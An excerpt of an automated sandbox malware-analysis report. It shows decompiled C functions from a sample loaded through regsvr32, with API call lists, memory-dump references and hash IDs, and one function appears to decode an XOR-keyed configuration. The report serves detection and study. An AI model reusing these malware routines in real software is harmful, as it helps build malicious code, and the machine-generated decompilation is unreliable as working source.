                                                                                                                                                                                                                                    0x023e21fa
                                                                                                                                                                                                                                    0x023e21fb
                                                                                                                                                                                                                                    0x023e2202
                                                                                                                                                                                                                                    0x023e221c
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x023e2204
                                                                                                                                                                                                                                    0x023e2204
                                                                                                                                                                                                                                    0x023e2206
                                                                                                                                                                                                                                    0x023e2209
                                                                                                                                                                                                                                    0x023e220d
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x023e220f
                                                                                                                                                                                                                                    0x023e220d
                                                                                                                                                                                                                                    0x023e2224
                                                                                                                                                                                                                                    0x023e2224
                                                                                                                                                                                                                                    0x023e2226
                                                                                                                                                                                                                                    0x023e222d
                                                                                                                                                                                                                                    0x023e222f
                                                                                                                                                                                                                                    0x023e2235
                                                                                                                                                                                                                                    0x023e223c
                                                                                                                                                                                                                                    0x023e224c
                                                                                                                                                                                                                                    0x023e2244
                                                                                                                                                                                                                                    0x023e2247
                                                                                                                                                                                                                                    0x023e2247
                                                                                                                                                                                                                                    0x023e224f
                                                                                                                                                                                                                                    0x023e224f
                                                                                                                                                                                                                                    0x023e2258
                                                                                                                                                                                                                                    0x023e2258
                                                                                                                                                                                                                                    0x023e2222
                                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                      • Part of subcall function 023E84D5: GetProcAddress.KERNEL32(36776F57,023E21E5), ref: 023E84F0
                                                                                                                                                                                                                                      • Part of subcall function 023E12D4: RtlAllocateHeap.NTDLL(00000000,63699BC3,00000000), ref: 023E12FF
                                                                                                                                                                                                                                      • Part of subcall function 023E12D4: RtlAllocateHeap.NTDLL(00000000,63699BC3), ref: 023E1321
                                                                                                                                                                                                                                      • Part of subcall function 023E12D4: memset.NTDLL ref: 023E133B
                                                                                                                                                                                                                                      • Part of subcall function 023E12D4: CreateFileA.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000080,00000000,73797325), ref: 023E1379
                                                                                                                                                                                                                                      • Part of subcall function 023E12D4: GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 023E138D
                                                                                                                                                                                                                                      • Part of subcall function 023E12D4: FindCloseChangeNotification.KERNELBASE(00000000), ref: 023E13A4
                                                                                                                                                                                                                                      • Part of subcall function 023E12D4: StrRChrA.SHLWAPI(?,00000000,0000005C), ref: 023E13B0
                                                                                                                                                                                                                                      • Part of subcall function 023E12D4: lstrcat.KERNEL32(?,642E2A5C), ref: 023E13F1
                                                                                                                                                                                                                                      • Part of subcall function 023E12D4: FindFirstFileA.KERNELBASE(?,?), ref: 023E1407
                                                                                                                                                                                                                                      • Part of subcall function 023E809F: lstrlen.KERNEL32(?,00000000,023ED330,00000001,023E2200,023ED00C,023ED00C,00000000,00000005,00000000,00000000,?,?,?,023E96C1,023E23E9), ref: 023E80A8
                                                                                                                                                                                                                                      • Part of subcall function 023E809F: mbstowcs.NTDLL ref: 023E80CF
                                                                                                                                                                                                                                      • Part of subcall function 023E809F: memset.NTDLL ref: 023E80E1
                                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000,023ED00C,023ED00C,023ED00C,00000000,00000005,00000000,00000000,?,?,?,023E96C1,023E23E9,023ED00C,?,023E23E9), ref: 023E221C
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.521955532.00000000023E1000.00000020.00020000.sdmp, Offset: 023E0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.521844516.00000000023E0000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522125051.00000000023EC000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522265607.00000000023ED000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522450053.00000000023EF000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_23e0000_regsvr32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: FileHeap$AllocateFindmemset$AddressChangeCloseCreateFirstFreeNotificationProcTimelstrcatlstrlenmbstowcs
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 983081259-0
                                                                                                                                                                                                                                    • Opcode ID: 2a9c51fc96f0a6182d4e496a96170c5eeecf41111a9bec162075e08d5c1bedf3
                                                                                                                                                                                                                                    • Instruction ID: 1f0105cb88fcccbb204d072958012f0aea035eda392092eaef0d28ad1de15e8e
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2a9c51fc96f0a6182d4e496a96170c5eeecf41111a9bec162075e08d5c1bedf3
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7A01F976A20124EAEF105EE5DC80B6B729DEB45358F400035ED46CA0D0D765DC499B21
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 023E1262, Relevance: 1.3, APIs: 1, Instructions: 41memoryCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                    			E023E1262(void** __esi, intOrPtr _a4, unsigned int _a8, void* _a12) {
				signed short _t18;
				void* _t24;
				signed int _t26;
				signed short _t27;

				if(_a4 != 0) {
					_t18 = E023E9318(_a4, _a8, _a12, __esi); // executed
					_t27 = _t18;
				} else {
					_t27 = E023E6BFA(0, 0x80000002, _a8, _a12,  &_a12,  &_a8);
					if(_t27 == 0) {
						_t26 = _a8 >> 1;
						if(_t26 == 0) {
							_t27 = 2;
							HeapFree( *0x23ed238, 0, _a12);
						} else {
							_t24 = _a12;
							 *(_t24 + _t26 * 2 - 2) =  *(_t24 + _t26 * 2 - 2) & _t27;
							 *__esi = _t24;
						}
					}
				}
				return _t27;
			}







                                                                                                                                                                                                                                    0x023e126a
                                                                                                                                                                                                                                    0x023e12bf
                                                                                                                                                                                                                                    0x023e12c4
                                                                                                                                                                                                                                    0x023e126c
                                                                                                                                                                                                                                    0x023e1286
                                                                                                                                                                                                                                    0x023e128a
                                                                                                                                                                                                                                    0x023e128f
                                                                                                                                                                                                                                    0x023e1291
                                                                                                                                                                                                                                    0x023e12a1
                                                                                                                                                                                                                                    0x023e12ad
                                                                                                                                                                                                                                    0x023e1293
                                                                                                                                                                                                                                    0x023e1293
                                                                                                                                                                                                                                    0x023e1296
                                                                                                                                                                                                                                    0x023e129b
                                                                                                                                                                                                                                    0x023e129b
                                                                                                                                                                                                                                    0x023e1291
                                                                                                                                                                                                                                    0x023e128a
                                                                                                                                                                                                                                    0x023e12ca

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000,?,00000000,80000002,76D7F710,?,?,76D7F710,00000000,?,023E743A,?,004F0053,04CC9388,00000000,?), ref: 023E12AD
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.521955532.00000000023E1000.00000020.00020000.sdmp, Offset: 023E0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.521844516.00000000023E0000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522125051.00000000023EC000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522265607.00000000023ED000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522450053.00000000023EF000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_23e0000_regsvr32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: FreeHeap
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 3298025750-0
                                                                                                                                                                                                                                    • Opcode ID: 7e268a072798635bdedf68c98e2a0776e02dd9eccfa01ea905991378018247df
                                                                                                                                                                                                                                    • Instruction ID: 01932a958e41af1097b429662cf2e5cd5e510ef97638c842ba847881f24dbb47
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7e268a072798635bdedf68c98e2a0776e02dd9eccfa01ea905991378018247df
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 42011232140259FBCF219F54CC01FAE3BAAEB54350F148429FA5A9A1A0D731D929DF50
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 023E2436, Relevance: 1.3, APIs: 1, Instructions: 36sleepCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 88%
                                                                                                                                                                                                                                    			E023E2436(intOrPtr* __edi) {
				intOrPtr _v8;
				char _v12;
				intOrPtr _v16;
				intOrPtr _t15;
				intOrPtr* _t21;

				_t21 = __edi;
				_push( &_v12);
				_push(__edi);
				_v8 = 0x1d4c0;
				_t15 =  *((intOrPtr*)( *__edi + 0xe0))();
				while(1) {
					_v16 = _t15;
					Sleep(0x1f4); // executed
					if(_v12 == 4) {
						break;
					}
					if(_v8 == 0) {
						L4:
						_t15 =  *((intOrPtr*)( *_t21 + 0xe0))(_t21,  &_v12);
						continue;
					} else {
						if(_v8 <= 0x1f4) {
							_v16 = 0x80004004;
						} else {
							_v8 = _v8 - 0x1f4;
							goto L4;
						}
					}
					L8:
					return _v16;
				}
				goto L8;
			}








                                                                                                                                                                                                                                    0x023e2436
                                                                                                                                                                                                                                    0x023e2443
                                                                                                                                                                                                                                    0x023e2444
                                                                                                                                                                                                                                    0x023e2445
                                                                                                                                                                                                                                    0x023e244c
                                                                                                                                                                                                                                    0x023e247a
                                                                                                                                                                                                                                    0x023e247b
                                                                                                                                                                                                                                    0x023e247e
                                                                                                                                                                                                                                    0x023e2484
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x023e2463
                                                                                                                                                                                                                                    0x023e246d
                                                                                                                                                                                                                                    0x023e2474
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x023e2465
                                                                                                                                                                                                                                    0x023e2468
                                                                                                                                                                                                                                    0x023e2488
                                                                                                                                                                                                                                    0x023e246a
                                                                                                                                                                                                                                    0x023e246a
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x023e246a
                                                                                                                                                                                                                                    0x023e2468
                                                                                                                                                                                                                                    0x023e248f
                                                                                                                                                                                                                                    0x023e2495
                                                                                                                                                                                                                                    0x023e2495
                                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • Sleep.KERNELBASE(000001F4), ref: 023E247E
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.521955532.00000000023E1000.00000020.00020000.sdmp, Offset: 023E0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.521844516.00000000023E0000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522125051.00000000023EC000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522265607.00000000023ED000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522450053.00000000023EF000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_23e0000_regsvr32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Sleep
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 3472027048-0
                                                                                                                                                                                                                                    • Opcode ID: 543aa90d4c2946dcb4687a7d727fd70716c8f48f352722967e31a007fc2cf13d
                                                                                                                                                                                                                                    • Instruction ID: 8be2aefe10e9c5b2e854bf4a09597675ff7b59985856f59ab09644984386de01
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 543aa90d4c2946dcb4687a7d727fd70716c8f48f352722967e31a007fc2cf13d
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 88F04F71D01229EFDF04DB94C488AEEB7BCEF04304F1080AAE90267181D7B45B48CF61
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 023EA66E, Relevance: 1.3, APIs: 1, Instructions: 23COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                    			E023EA66E(void* __edx, void* __edi, void* _a4) {
				int _t7;
				int _t13;

				_t7 = E023E7323(__edx, __edi, _a4,  &_a4); // executed
				_t13 = _t7;
				if(_t13 != 0) {
					memcpy(__edi, _a4, _t13);
					 *((char*)(__edi + _t13)) = 0;
					E023E9039(_a4);
				}
				return _t13;
			}





                                                                                                                                                                                                                                    0x023ea67a
                                                                                                                                                                                                                                    0x023ea67f
                                                                                                                                                                                                                                    0x023ea683
                                                                                                                                                                                                                                    0x023ea68a
                                                                                                                                                                                                                                    0x023ea695
                                                                                                                                                                                                                                    0x023ea699
                                                                                                                                                                                                                                    0x023ea699
                                                                                                                                                                                                                                    0x023ea6a2

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                      • Part of subcall function 023E7323: memcpy.NTDLL(00000000,00000090,00000002,00000002,023E685F,00000008,023E685F,023E685F,?,023E858C,023E685F), ref: 023E7359
                                                                                                                                                                                                                                      • Part of subcall function 023E7323: memset.NTDLL ref: 023E73CF
                                                                                                                                                                                                                                      • Part of subcall function 023E7323: memset.NTDLL ref: 023E73E3
                                                                                                                                                                                                                                    • memcpy.NTDLL(00000002,023E685F,00000000,00000002,023E685F,023E685F,023E685F,?,023E858C,023E685F,?,023E685F,00000002,?,?,023E2417), ref: 023EA68A
                                                                                                                                                                                                                                      • Part of subcall function 023E9039: HeapFree.KERNEL32(00000000,00000000,023E7F18,00000000,?,?,00000000), ref: 023E9045
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.521955532.00000000023E1000.00000020.00020000.sdmp, Offset: 023E0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.521844516.00000000023E0000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522125051.00000000023EC000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522265607.00000000023ED000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522450053.00000000023EF000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_23e0000_regsvr32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: memcpymemset$FreeHeap
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 3053036209-0
                                                                                                                                                                                                                                    • Opcode ID: 10b87d9068704a00f4c0b83e48a122f1ee3d32e81302abe31c4643e426d095cc
                                                                                                                                                                                                                                    • Instruction ID: c25c872ec3324f389fe398857f06f28712ea9b846646a5df5308673ee29584f2
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 10b87d9068704a00f4c0b83e48a122f1ee3d32e81302abe31c4643e426d095cc
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 74E08672404238B6CF222A95DC00EFFBF5E9F45691F404011FE0A49240D621D91497E1
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Non-executed Functions

                                                                                                                                                                                                                                    Function 023E4094, Relevance: 9.2, APIs: 6, Instructions: 223memoryCOMMONCrypto
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 92%
                                                                                                                                                                                                                                    			E023E4094(int* __ecx) {
				int _v8;
				void* _v12;
				void* __esi;
				signed int _t20;
				signed int _t25;
				char* _t31;
				char* _t32;
				char* _t33;
				char* _t34;
				char* _t35;
				void* _t36;
				void* _t37;
				void* _t38;
				intOrPtr _t39;
				void* _t41;
				intOrPtr _t42;
				intOrPtr _t43;
				signed int _t46;
				intOrPtr _t49;
				signed int _t50;
				signed int _t55;
				void* _t57;
				void* _t58;
				signed int _t60;
				signed int _t64;
				signed int _t68;
				signed int _t72;
				signed int _t76;
				signed int _t80;
				void* _t85;
				intOrPtr _t102;

				_t86 = __ecx;
				_t20 =  *0x23ed278; // 0x63699bc3
				if(E023E8748( &_v12,  &_v8, _t20 ^ 0x8241c5a7) != 0 && _v8 >= 0x90) {
					 *0x23ed2d4 = _v12;
				}
				_t25 =  *0x23ed278; // 0x63699bc3
				if(E023E8748( &_v12,  &_v8, _t25 ^ 0xecd84622) == 0) {
					_push(2);
					_pop(0);
					goto L60;
				} else {
					_t85 = _v12;
					if(_t85 == 0) {
						_t31 = 0;
					} else {
						_t80 =  *0x23ed278; // 0x63699bc3
						_t31 = E023E3F7C(_t86, _t85, _t80 ^ 0x724e87bc);
					}
					if(_t31 != 0) {
						_t86 =  &_v8;
						if(StrToIntExA(_t31, 0,  &_v8) != 0) {
							 *0x23ed240 = _v8;
						}
					}
					if(_t85 == 0) {
						_t32 = 0;
					} else {
						_t76 =  *0x23ed278; // 0x63699bc3
						_t32 = E023E3F7C(_t86, _t85, _t76 ^ 0x2b40cc40);
					}
					if(_t32 != 0) {
						_t86 =  &_v8;
						if(StrToIntExA(_t32, 0,  &_v8) != 0) {
							 *0x23ed244 = _v8;
						}
					}
					if(_t85 == 0) {
						_t33 = 0;
					} else {
						_t72 =  *0x23ed278; // 0x63699bc3
						_t33 = E023E3F7C(_t86, _t85, _t72 ^ 0x3b27c2e6);
					}
					if(_t33 != 0) {
						_t86 =  &_v8;
						if(StrToIntExA(_t33, 0,  &_v8) != 0) {
							 *0x23ed248 = _v8;
						}
					}
					if(_t85 == 0) {
						_t34 = 0;
					} else {
						_t68 =  *0x23ed278; // 0x63699bc3
						_t34 = E023E3F7C(_t86, _t85, _t68 ^ 0x0602e249);
					}
					if(_t34 != 0) {
						_t86 =  &_v8;
						if(StrToIntExA(_t34, 0,  &_v8) != 0) {
							 *0x23ed004 = _v8;
						}
					}
					if(_t85 == 0) {
						_t35 = 0;
					} else {
						_t64 =  *0x23ed278; // 0x63699bc3
						_t35 = E023E3F7C(_t86, _t85, _t64 ^ 0x3603764c);
					}
					if(_t35 != 0) {
						_t86 =  &_v8;
						if(StrToIntExA(_t35, 0,  &_v8) != 0) {
							 *0x23ed02c = _v8;
						}
					}
					if(_t85 == 0) {
						_t36 = 0;
					} else {
						_t60 =  *0x23ed278; // 0x63699bc3
						_t36 = E023E3F7C(_t86, _t85, _t60 ^ 0x2cc1f2fd);
					}
					if(_t36 != 0) {
						_push(_t36);
						_t57 = 0x10;
						_t58 = E023E6ED2(_t57);
						if(_t58 != 0) {
							_push(_t58);
							E023EA5D6();
						}
					}
					if(_t85 == 0) {
						_t37 = 0;
					} else {
						_t55 =  *0x23ed278; // 0x63699bc3
						_t37 = E023E3F7C(_t86, _t85, _t55 ^ 0xb30fc035);
					}
					if(_t37 != 0 && E023E6ED2(0, _t37) != 0) {
						_t102 =  *0x23ed32c; // 0x4cc95b0
						E023E75E9(_t102 + 4, _t53);
					}
					if(_t85 == 0) {
						_t38 = 0;
					} else {
						_t50 =  *0x23ed278; // 0x63699bc3
						_t38 = E023E3F7C(_t86, _t85, _t50 ^ 0x372ab5b7);
					}
					if(_t38 == 0) {
						L51:
						_t39 =  *0x23ed27c; // 0x28da5a8
						_t18 = _t39 + 0x23ee252; // 0x616d692f
						 *0x23ed2d0 = _t18;
						goto L52;
					} else {
						_t49 = E023E6ED2(0, _t38);
						 *0x23ed2d0 = _t49;
						if(_t49 != 0) {
							L52:
							if(_t85 == 0) {
								_t41 = 0;
							} else {
								_t46 =  *0x23ed278; // 0x63699bc3
								_t41 = E023E3F7C(_t86, _t85, _t46 ^ 0xd8dc5cde);
							}
							if(_t41 == 0) {
								_t42 =  *0x23ed27c; // 0x28da5a8
								_t19 = _t42 + 0x23ee791; // 0x6976612e
								_t43 = _t19;
							} else {
								_t43 = E023E6ED2(0, _t41);
							}
							 *0x23ed340 = _t43;
							HeapFree( *0x23ed238, 0, _t85);
							L60:
							return 0;
						}
						goto L51;
					}
				}
			}


































                                                                                                                                                                                                                                    0x023e4094
                                                                                                                                                                                                                                    0x023e4097
                                                                                                                                                                                                                                    0x023e40b7
                                                                                                                                                                                                                                    0x023e40c5
                                                                                                                                                                                                                                    0x023e40c5
                                                                                                                                                                                                                                    0x023e40ca
                                                                                                                                                                                                                                    0x023e40e4
                                                                                                                                                                                                                                    0x023e42e2
                                                                                                                                                                                                                                    0x023e42e4
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x023e40ea
                                                                                                                                                                                                                                    0x023e40ea
                                                                                                                                                                                                                                    0x023e40f1
                                                                                                                                                                                                                                    0x023e4107
                                                                                                                                                                                                                                    0x023e40f3
                                                                                                                                                                                                                                    0x023e40f3
                                                                                                                                                                                                                                    0x023e4100
                                                                                                                                                                                                                                    0x023e4100
                                                                                                                                                                                                                                    0x023e4111
                                                                                                                                                                                                                                    0x023e4113
                                                                                                                                                                                                                                    0x023e411d
                                                                                                                                                                                                                                    0x023e4122
                                                                                                                                                                                                                                    0x023e4122
                                                                                                                                                                                                                                    0x023e411d
                                                                                                                                                                                                                                    0x023e4129
                                                                                                                                                                                                                                    0x023e413f
                                                                                                                                                                                                                                    0x023e412b
                                                                                                                                                                                                                                    0x023e412b
                                                                                                                                                                                                                                    0x023e4138
                                                                                                                                                                                                                                    0x023e4138
                                                                                                                                                                                                                                    0x023e4143
                                                                                                                                                                                                                                    0x023e4145
                                                                                                                                                                                                                                    0x023e414f
                                                                                                                                                                                                                                    0x023e4154
                                                                                                                                                                                                                                    0x023e4154
                                                                                                                                                                                                                                    0x023e414f
                                                                                                                                                                                                                                    0x023e415b
                                                                                                                                                                                                                                    0x023e4171
                                                                                                                                                                                                                                    0x023e415d
                                                                                                                                                                                                                                    0x023e415d
                                                                                                                                                                                                                                    0x023e416a
                                                                                                                                                                                                                                    0x023e416a
                                                                                                                                                                                                                                    0x023e4175
                                                                                                                                                                                                                                    0x023e4177
                                                                                                                                                                                                                                    0x023e4181
                                                                                                                                                                                                                                    0x023e4186
                                                                                                                                                                                                                                    0x023e4186
                                                                                                                                                                                                                                    0x023e4181
                                                                                                                                                                                                                                    0x023e418d
                                                                                                                                                                                                                                    0x023e41a3
                                                                                                                                                                                                                                    0x023e418f
                                                                                                                                                                                                                                    0x023e418f
                                                                                                                                                                                                                                    0x023e419c
                                                                                                                                                                                                                                    0x023e419c
                                                                                                                                                                                                                                    0x023e41a7
                                                                                                                                                                                                                                    0x023e41a9
                                                                                                                                                                                                                                    0x023e41b3
                                                                                                                                                                                                                                    0x023e41b8
                                                                                                                                                                                                                                    0x023e41b8
                                                                                                                                                                                                                                    0x023e41b3
                                                                                                                                                                                                                                    0x023e41bf
                                                                                                                                                                                                                                    0x023e41d5
                                                                                                                                                                                                                                    0x023e41c1
                                                                                                                                                                                                                                    0x023e41c1
                                                                                                                                                                                                                                    0x023e41ce
                                                                                                                                                                                                                                    0x023e41ce
                                                                                                                                                                                                                                    0x023e41d9
                                                                                                                                                                                                                                    0x023e41db
                                                                                                                                                                                                                                    0x023e41e5
                                                                                                                                                                                                                                    0x023e41ea
                                                                                                                                                                                                                                    0x023e41ea
                                                                                                                                                                                                                                    0x023e41e5
                                                                                                                                                                                                                                    0x023e41f1
                                                                                                                                                                                                                                    0x023e4207
                                                                                                                                                                                                                                    0x023e41f3
                                                                                                                                                                                                                                    0x023e41f3
                                                                                                                                                                                                                                    0x023e4200
                                                                                                                                                                                                                                    0x023e4200
                                                                                                                                                                                                                                    0x023e420b
                                                                                                                                                                                                                                    0x023e420d
                                                                                                                                                                                                                                    0x023e4210
                                                                                                                                                                                                                                    0x023e4211
                                                                                                                                                                                                                                    0x023e4218
                                                                                                                                                                                                                                    0x023e421a
                                                                                                                                                                                                                                    0x023e421b
                                                                                                                                                                                                                                    0x023e421b
                                                                                                                                                                                                                                    0x023e4218
                                                                                                                                                                                                                                    0x023e4222
                                                                                                                                                                                                                                    0x023e4238
                                                                                                                                                                                                                                    0x023e4224
                                                                                                                                                                                                                                    0x023e4224
                                                                                                                                                                                                                                    0x023e4231
                                                                                                                                                                                                                                    0x023e4231
                                                                                                                                                                                                                                    0x023e423c
                                                                                                                                                                                                                                    0x023e424a
                                                                                                                                                                                                                                    0x023e4254
                                                                                                                                                                                                                                    0x023e4254
                                                                                                                                                                                                                                    0x023e425b
                                                                                                                                                                                                                                    0x023e4271
                                                                                                                                                                                                                                    0x023e425d
                                                                                                                                                                                                                                    0x023e425d
                                                                                                                                                                                                                                    0x023e426a
                                                                                                                                                                                                                                    0x023e426a
                                                                                                                                                                                                                                    0x023e4275
                                                                                                                                                                                                                                    0x023e4288
                                                                                                                                                                                                                                    0x023e4288
                                                                                                                                                                                                                                    0x023e428d
                                                                                                                                                                                                                                    0x023e4293
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x023e4277
                                                                                                                                                                                                                                    0x023e427a
                                                                                                                                                                                                                                    0x023e4281
                                                                                                                                                                                                                                    0x023e4286
                                                                                                                                                                                                                                    0x023e4298
                                                                                                                                                                                                                                    0x023e429a
                                                                                                                                                                                                                                    0x023e42b0
                                                                                                                                                                                                                                    0x023e429c
                                                                                                                                                                                                                                    0x023e429c
                                                                                                                                                                                                                                    0x023e42a9
                                                                                                                                                                                                                                    0x023e42a9
                                                                                                                                                                                                                                    0x023e42b4
                                                                                                                                                                                                                                    0x023e42c0
                                                                                                                                                                                                                                    0x023e42c5
                                                                                                                                                                                                                                    0x023e42c5
                                                                                                                                                                                                                                    0x023e42b6
                                                                                                                                                                                                                                    0x023e42b9
                                                                                                                                                                                                                                    0x023e42b9
                                                                                                                                                                                                                                    0x023e42d3
                                                                                                                                                                                                                                    0x023e42d8
                                                                                                                                                                                                                                    0x023e42e5
                                                                                                                                                                                                                                    0x023e42e9
                                                                                                                                                                                                                                    0x023e42e9
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x023e4286
                                                                                                                                                                                                                                    0x023e4275

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • StrToIntExA.SHLWAPI(00000000,00000000,?,023E23DE,?,63699BC3,023E23DE,?,63699BC3,00000005,023ED00C,00000008,?,023E23DE), ref: 023E4119
                                                                                                                                                                                                                                    • StrToIntExA.SHLWAPI(00000000,00000000,?,023E23DE,?,63699BC3,023E23DE,?,63699BC3,00000005,023ED00C,00000008,?,023E23DE), ref: 023E414B
                                                                                                                                                                                                                                    • StrToIntExA.SHLWAPI(00000000,00000000,?,023E23DE,?,63699BC3,023E23DE,?,63699BC3,00000005,023ED00C,00000008,?,023E23DE), ref: 023E417D
                                                                                                                                                                                                                                    • StrToIntExA.SHLWAPI(00000000,00000000,?,023E23DE,?,63699BC3,023E23DE,?,63699BC3,00000005,023ED00C,00000008,?,023E23DE), ref: 023E41AF
                                                                                                                                                                                                                                    • StrToIntExA.SHLWAPI(00000000,00000000,?,023E23DE,?,63699BC3,023E23DE,?,63699BC3,00000005,023ED00C,00000008,?,023E23DE), ref: 023E41E1
                                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000,023E23DE,023E23DE,?,63699BC3,023E23DE,?,63699BC3,00000005,023ED00C,00000008,?,023E23DE), ref: 023E42D8
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.521955532.00000000023E1000.00000020.00020000.sdmp, Offset: 023E0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.521844516.00000000023E0000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522125051.00000000023EC000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522265607.00000000023ED000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522450053.00000000023EF000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_23e0000_regsvr32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: FreeHeap
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 3298025750-0
                                                                                                                                                                                                                                    • Opcode ID: 9524d8eca29e1b8d6b9e5377bbc1bd5688b708e4eecd1f080ea1f6ffe6836481
                                                                                                                                                                                                                                    • Instruction ID: 33a4e0a23495c67bc432b0f0e6f870dbf9dedc9e8a64dc61ec7a468f6814ffca
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9524d8eca29e1b8d6b9e5377bbc1bd5688b708e4eecd1f080ea1f6ffe6836481
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 306141F0A20228EADF30EAB4DD8496B76ED9B5C704B244D25E603EB2C5E731D95D8B11
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

